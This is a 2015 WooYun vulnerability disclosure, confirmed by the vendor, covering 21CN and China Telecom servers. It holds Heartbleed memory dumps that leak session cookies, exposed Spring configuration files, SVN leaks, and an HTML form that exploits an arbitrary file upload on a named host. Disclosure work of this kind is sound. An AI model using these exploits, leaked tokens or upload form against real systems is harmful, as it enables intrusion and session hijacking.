当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091673

漏洞标题:21CN漏洞群

相关厂商:世纪龙信息网络有限责任公司

漏洞作者: 杀器王子

提交时间:2015-01-13 18:48

修复时间:2015-02-27 18:48

公开时间:2015-02-27 18:48

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-13: 细节已通知厂商并且等待厂商处理中
2015-01-13: 厂商已经确认,细节仅向厂商公开
2015-01-23: 细节向核心白帽子及相关领域专家公开
2015-02-02: 细节向普通白帽子公开
2015-02-12: 细节向实习白帽子公开
2015-02-27: 细节向公众公开

简要描述:

21cn漏洞群

详细说明:

0x00 心脏滴血1
https://121.14.133.156/

@....SC[...r....+..H...9........w.3....f.....\".!.9.8.........5.............................3.2.....E.D...../...A.................................I...........4.2...................................................#.......ML, like Gecko) Chrome/31.0.1650.63 Safari/537.36..Referer: https://open.e.189.cn/api/account/unifyAccountLogin.do?appId=189store&clientType=1&format=redirect&version=v1.0¶s=9ebaff43a48702c2c361d77394a04ace81bdf2ede5fdb8511b869dc2be5049fac4c50814317e8b8b976d4ab9d7b99b8e8c83983ee4d8d13375c3c3ed666a02ca447ce8993e09120a2da6997666f3404b6d9e24ada92be67c53f9611337de7eeaff111e7b8fd970241ed850fadb6c33467a27994f161fe214a0c8608988c1e839e6d5b335b8ed33e85e752ecb19157f573c6d4c9b2ed4e49ac1561667346f855a307c60923abde005d859687602915832745555ef4f26abcd5d7a2c032cbb53b1d8bcf75fcd567018b426880e&sign=CFF75F6DB9F84F39F80446C0100DD11E00DC61CE&className=two..Accept-Encoding: gzip,deflate,sdch..Accept-Language: zh-CN,zh;q=0.8..Cookie: ver=7; afpv=afpid=191224330912514829....Rur.5....f...\\...3.....^...w.......Lr#..d.0.....-.:..9.I7..-kie: ver=7; afpv=afpid=141321389376015335; 21CN_OCP=03a27bfd473e9185e17a08c943258e05988340de38b4d408; 21CN_OCU=03a27bfd473e9185e17a08c943258e055cf59f88618014c7b647ee6fbfa0196ba261c74cc64ab485a3f645e2e1c303167d6cafc8cfea1d0e9068b737014a0291ef8f49dd0c07d9fc55f996e51fb035b9769d6d52f5156e92c0142a63c7bef0b086f7ecd6468644fa5108ec4674d4220206ee703f115936b7448a72acacf0865aef9fada6241203ff50621ef75909351c622f0c34a222b0190a41cc7f9227bf5e43b61f33d518908a0ef17a03a0e9a82b44fbc13b5f5d904223aa268d74660889fd5452625f61dd6835d0f38c9113758862525c455bc6764b.......*.m|......2...(H.....0*.../.. ...3......N...7..t...f*....$5c455bc6764b; _UAI=zhnb.960x540; _wa_pk_cookie=145537457.....A.:.9.....K...................6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)..Host: afp.21cn.com..Connection: Keep-Alive..Cookie: ver=7; afpv=afpid=191181501498648904.......Q....tS/........*..._z)..Pe....R.{..{.@..,\"..%.05AE875C67359718BF02470F147E2735A5B759F8521C7A32BE1FAE58E2D..>.C...i......z.E.............e,..P,....}zh.>W|v\"._3.....~0).c.....H.z..@.\'..{..j).e.mO..$Q.2.3...-..c.+A......(-.....-.r|...._.../.F.u.X.. P.............Y.....F....A <..6...(..i.....O.|... ..%..Z...m..2....d.).*..XWu.....g~......*h..=t..p.%....!.Er..\\+.{T.9./b\\.O,..b.ho.H.M.1.......}.....]=kvs..>!ck....I.....f~.g.n....V..7D.D.K.C.a...i.....s.7..e..=....6H..3...`H..Aj.`-)........nd&?o.hi...1..).e.`.>V.x.Z.I.P\\]s.....W...A.t..&.T.....A.]-A./.&-..8p&.V.K.,...W.q...E...........M.:.)K..;T...(........ .....g..%.ErK.-....)q..?r.=i..o....xZ&...w.9...%.v*!...S....*.....>...A.......Q.I....\'{...._Kq.....j..b..67.2.\\Q~\\W.>?9...%.B.y.D..U....%V....n<../..bM..........|.R.zH.y..........:@]. ...n-:..].[.%...n........../D}..\\......}.k...DB.,b..C......K...+...2..^..wCz&..1..;.beY.....WF*mX.%.?W...Ap.x........3...N.....D....xit..E...vk..g/]7.t.z...7.SP...*....v:.b.......B...m..5.D..>..5.,...W.......r.H...T...Q.H,\\..h.d...Q.\".....c2......[..k.2e.v......zB....\\|....D!..P.J;.fN..8l...cd....qw..y(............xO.....`5.P.p.Y.....&-O.@......N...P.C.f4.d.x...e.......7,....t..V...CW^...^6.D.w .....mUhA..={!..l....Y.(xHM[[..g.+....o...... ...b..8~.E...$|Q.97e..._...dB...+/.[...L.Zi.....A.....@2..y.-ep.......M.-J\'U..m..;.C.d..6.V.b36I...?w.w.R.....Z............\'.:........a>.BIAg].....6*Ny......{.T_....G...O.....oj..........H...J.-.........{L.D..O.....{.n.=...T.V...~....\"5<...3..3.|...70.n.\"....[....9..IM......H.......d&...8MZx.....w.>......v..KQ..V.A.A.$.N mI.P.(wlo.).A...N.K.=.....bZ]{..4.UF?fxg....Wz....s...........mVIT..3TD....yg;...9..........9sW-......C....9?m..lS.\'...\'{H..*..&..TY.l.....A....`.O......H.9...b.....A*.E..~.n*.....U.V@Yv.5.........!7....go..c..i.~.|...5}C..(o{.c....o...@..[;..t..... .f..n...{AW:....Q..[d*....l.Y.<. .....`U..G....v...-y...i]....H..........}.H.\'...`.p....@.........7Q....P.I.=...n..`.......@../,M.R.t........e#;.h.<.../.kg..{.y.C...&.^y....}.>j......r.X....c9Z.......B .y.oV..F.r.....r..L...m<n....k^/..5.Hvn...[....u.a....[5.h.YMH.F...w../..y..T...Y..O..f.....x.....W.....o...uV.....T.D.E...w......;.....;.\'5.....j.+jK....4H.l...`..:...;.$.w..|O...Y5..*.......G.*.............=.G)......]%X..q...\'B.r._.[=.<f=..i...D.=.(KED*\\~.Sv4P\\~Z.....x.7..vy.V.....=.~V.....j...-n\'.5..1..7....;o../......yI.V\"....U..&..XW.47.1.$...3.\'%..t..M...LD.l\'....C.;......6A...FR..c.S...zj..lN^6R.!..#......#.=A.,%.+.;..v2S.qSoE.........<w.Y.j....-..q.p.C.s..k......P.tK.....AF ....\'{.TM.F.*..{@w:D.....CX.B/...2._..<\'k.r7.e....)..PC.t...8............h.\'..)....Jj.t|.*.......f....t.e.........`.....^-..........gI\\S.h......8........Y...l.....$.LK....U...y......t_o...........TJF.s...U.J.;....$.W....,..;.*...l.>..._ZZ.OF....A.~..W.5...x.....H..t..v.........\".f.......;...._n:....(L&..s..-C...K.......I&p..7..........G..a.L.........D8......ou.z..rn....o.;...-.%.1@..G!B.S@...6....s...|A.P...5t..D.M.8;*...i..._...g..s.........\\..A...&......\'!...-sZP..


0x01 心脏滴血2
https://121.14.133.157

P......=P....../f.I............DP......H.......OP.......P....../f.I.............P......A........P.......P.......`....6$.........P...............Q.......Q......200 OKServer.Resin/3.1.8.serverP3P.CP=\"NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV\".p3pPragma.no-cache.pragmaCache-Control.max-age=0.cache-control.xN......cQ......Expires.Thu Jan 01 08:00:00 CST 1970.expiresSet-Cookie.adi=CN340000-36.57.249.26; path=/; expires=Tue, 20-Jan-2015 03:08:20 GMT.set-cookieSet-Cookie.adu=i3xu4vxi.lefw0; path=/; expires=Mon, 08-Dec-2064 03:08:20 GMT.set-cookieContent-Type.text/html; charset=UTF-8.content-typesContHQ.......................................R...............R.......R......8:50 GMT.date....;.......V.......V..............8S......8S.......................Q......8S......................................HTTP/1.1 200 OK..Server: nginx/1.4.4..Date: Sun, 21 Dec 2014 02:28:50 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..P3P: CP=\"NOI DSP COR CURa ADMa DEVa PSAa Date.Sun, 21 Dec 2014 03:08:20 GMT.datea.;......he-Contr.?..............EU......EU......................`S......EU......................................HTTP/1.1 200 OK..Server: nginx/1.4.4..Date: Sun, 21 Dec 2014 03:08:21 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..P3P: CP=\"NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV\"..Pragma: no-cache..Cache-Control: max-age=0..Expires: Thu Jan 01 08:00:00 CST 1970..Set-Cookie: adi=CN340000-36.57.249.26; path=/; expires=Tue, 20-Jan-2015 03:08:20 GMT..Set-Cookie: adu=i3xu4vxi.lefw0; path=/; expires=Mon, 08-Dec-2064 03:08:20 GMT........S...............H...............X.......X...................... V...... V......`.j..............H..............hU..............hU......0@.......>..............bf.......................?.......U..............!...................:....................1.8..P3P: CP=\"NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV\"..Pragma: no-cache..Cache-Control: max-age=0..Expires: Thu Jan 01 08:00:00 CST 1970..Set-Cookie: adi=CN340000-36.57.249.26; path=/; expires=Tue, 20-Jan-2015 03:08:20 GMT..Set-Cookie: adu=i3xu4vxi.lefw0; path=/; expires=Mon, 08-Dec-2064 03:08:20 GMT..Content-Type: text/html; charset=UTF-8..Date: Sun, 21 Dec 2014 03:08:20 GMT....<a href=\"http://market.21cn.com/w/free/mail/qiyeyou/youjian.html\" target=\"_blank\"><img src=\"http://market.21cn.com/w/free/mail/qiyeyou/130x100.jpg\" width=\"130\" height=\"100\" border=\"0\" /></a>. height=\"100\" border=\"0\" /></a>.................................


0x02 21cn member 源码泄露
http://121.14.129.235/WEB-INF/classes/resources/applicationContext.xml
可获得整站源码

This XML file does not appear to have any style information associated with it. The document tree is shown below.
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:p="http://www.springframework.org/schema/p" xmlns:context="http://www.springframework.org/schema/context" xmlns:aop="http://www.springframework.org/schema/aop" xmlns:tx="http://www.springframework.org/schema/tx" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-3.0.xsd http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-3.0.xsd http://www.springframework.org/schema/aop http://www.springframework.org/schema/aop/spring-aop-3.0.xsd http://www.springframework.org/schema/tx http://www.springframework.org/schema/tx/spring-tx-3.0.xsd">
<context:component-scan base-package="com._21cn.member.*"/>
<context:component-scan base-package="com._21cn.sequence.*"/>
<tx:annotation-driven/>
<context:annotation-config/>
<aop:aspectj-autoproxy/>
<bean class="org.springframework.aop.framework.autoproxy.DefaultAdvisorAutoProxyCreator"/>
<bean id="multipartResolver" class="org.springframework.web.multipart.commons.CommonsMultipartResolver" p:maxUploadSize="5120000" p:maxInMemorySize="512"/>
<bean class="org.springframework.web.servlet.mvc.annotation.DefaultAnnotationHandlerMapping"/>
<!--  configure DataSource  -->
<bean id="dataSource" class="org.springframework.jndi.JndiObjectFactoryBean">
<property name="jndiName">
<value>java:comp/env/jdbc/uud189</value>
</property>
</bean>
<bean id="transactionManager" class="org.springframework.jdbc.datasource.DataSourceTransactionManager">
<property name="dataSource">
<ref bean="dataSource"/>
</property>
</bean>
<!--  oracle clob  -->
<bean id="nativeJdbcExtractor" class="org.springframework.jdbc.support.nativejdbc.CommonsDbcpNativeJdbcExtractor" lazy-init="true"/>
<bean id="lobHandler" class="org.springframework.jdbc.support.lob.OracleLobHandler" lazy-init="true">
<property name="nativeJdbcExtractor">
<ref local="nativeJdbcExtractor"/>
</property>
</bean>
<bean id="sqlMapClient" class="org.springframework.orm.ibatis.SqlMapClientFactoryBean">
<property name="configLocation">
<value>classpath:/resources/SqlMapConfig.xml</value>
</property>
<property name="dataSource" ref="dataSource"/>
<property name="lobHandler">
<ref local="lobHandler"/>
</property>
</bean>
<bean id="propertyConfigurer" class="org.springframework.beans.factory.config.PropertyPlaceholderConfigurer">
<property name="fileEncoding" value="UTF-8"/>
<property name="locations">
<list>
<value>classpath:mailsender.properties</value>
<value>classpath:messages.properties</value>
</list>
</property>
</bean>
<bean id="messageSource" class="org.springframework.context.support.ReloadableResourceBundleMessageSource">
<property name="defaultEncoding" value="utf-8"/>
<property name="useCodeAsDefaultMessage" value="true"/>
<property name="cacheSeconds" value="10"/>
<property name="basenames">
<list>
<value>classpath:messages</value>
<value>classpath:com/_21cn/member/error-messages</value>
</list>
</property>
</bean>
<!--  jdbctemplate  -->
<bean id="jdbcTemplate" class="org.springframework.jdbc.core.JdbcTemplate">
<property name="dataSource">
<ref bean="dataSource"/>
</property>
</bean>
<!--
 
	<import resource="spring.rpc.mina.client-component.xml" />
	 
-->
<import resource="applicationContext-mailsender.xml"/>
<import resource="applicationContext-memcached.xml"/>
<import resource="applicationContext-captcha.xml"/>
<!--
 <import resource="applicationContext-quartz.xml" /> 
-->
</beans>


0x03 21cn passport整站源码泄露
http://121.14.129.232/WEB-INF/applicationContext.xml

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:p="http://www.springframework.org/schema/p" xmlns:context="http://www.springframework.org/schema/context" xmlns:aop="http://www.springframework.org/schema/aop" xmlns:tx="http://www.springframework.org/schema/tx" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-3.0.xsd http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-3.0.xsd http://www.springframework.org/schema/aop http://www.springframework.org/schema/aop/spring-aop-3.0.xsd http://www.springframework.org/schema/tx http://www.springframework.org/schema/tx/spring-tx-3.0.xsd">
<context:component-scan base-package="com._21cn.passport.*"/>
<tx:annotation-driven/>
<context:annotation-config/>
<aop:aspectj-autoproxy/>
<bean class="org.springframework.aop.framework.autoproxy.DefaultAdvisorAutoProxyCreator"/>
<bean id="multipartResolver" class="org.springframework.web.multipart.commons.CommonsMultipartResolver" p:maxUploadSize="5120000" p:maxInMemorySize="512"/>
<bean class="org.springframework.web.servlet.mvc.annotation.DefaultAnnotationHandlerMapping"/>
<!--  configure DataSource  -->
<bean id="dataSource" class="org.springframework.jndi.JndiObjectFactoryBean">
<property name="jndiName">
<value>java:comp/env/jdbc/uud</value>
</property>
</bean>
<bean id="transactionManager" class="org.springframework.jdbc.datasource.DataSourceTransactionManager">
<property name="dataSource">
<ref bean="dataSource"/>
</property>
</bean>
<!--  oracle clob  -->
<bean id="nativeJdbcExtractor" class="org.springframework.jdbc.support.nativejdbc.CommonsDbcpNativeJdbcExtractor" lazy-init="true"/>
<bean id="lobHandler" class="org.springframework.jdbc.support.lob.OracleLobHandler" lazy-init="true">
<property name="nativeJdbcExtractor">
<ref local="nativeJdbcExtractor"/>
</property>
</bean>
<bean id="sqlMapClient" class="org.springframework.orm.ibatis.SqlMapClientFactoryBean">
<property name="configLocation">
<value>/WEB-INF/SqlMapConfig.xml</value>
</property>
<property name="dataSource" ref="dataSource"/>
<property name="lobHandler">
<ref local="lobHandler"/>
</property>
</bean>
<bean id="messageSource" class="org.springframework.context.support.ReloadableResourceBundleMessageSource">
<property name="defaultEncoding" value="iso-8859-1"/>
<property name="useCodeAsDefaultMessage" value="true"/>
<property name="cacheSeconds" value="10"/>
<property name="basenames">
<list>
<value>classpath:messages</value>
<value>classpath:com/_21cn/passport/error-messages</value>
</list>
</property>
</bean>
<!--  jdbctemplate  -->
<bean id="jdbcTemplate" class="org.springframework.jdbc.core.JdbcTemplate">
<property name="dataSource">
<ref bean="dataSource"/>
</property>
</bean>
<!--
 	
 	<import resource="spring.rpc.mina.client-passport.xml" />
	<import resource="spring.rpc.mina.server-passport.xml" />
 
-->
<import resource="spring.rpc.mina.client-component.xml"/>
<import resource="applicationContext-mailsender.xml"/>
<import resource="applicationContext-captcha.xml"/>
</beans>


0x03 passport源码泄露 3
http://121.14.129.226/WEB-INF/applicationContext.xml
内容同上

漏洞证明:

0x04 短信管理平台 svn泄露+任意文件上传
http://121.14.133.89:9000/
svn泄露

Snip20150113_11.png


<form method="post" action="http://121.14.133.89:9000/upload.jsp"
 enctype="multipart/form-data">
 
 <input name="filename" type=file>
  <input type=submit>
</form>


任意文件上传
http://121.14.133.89:9000/upload/

Snip20150113_12.png


0x05 电信微信平台 svn泄露
http://admin.189wx.net/
http://manager.189wx.net/

Snip20150113_13.png


修复方案:

版权声明:转载请注明来源 杀器王子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-01-13 18:59

厂商回复:

已确认

最新状态:

暂无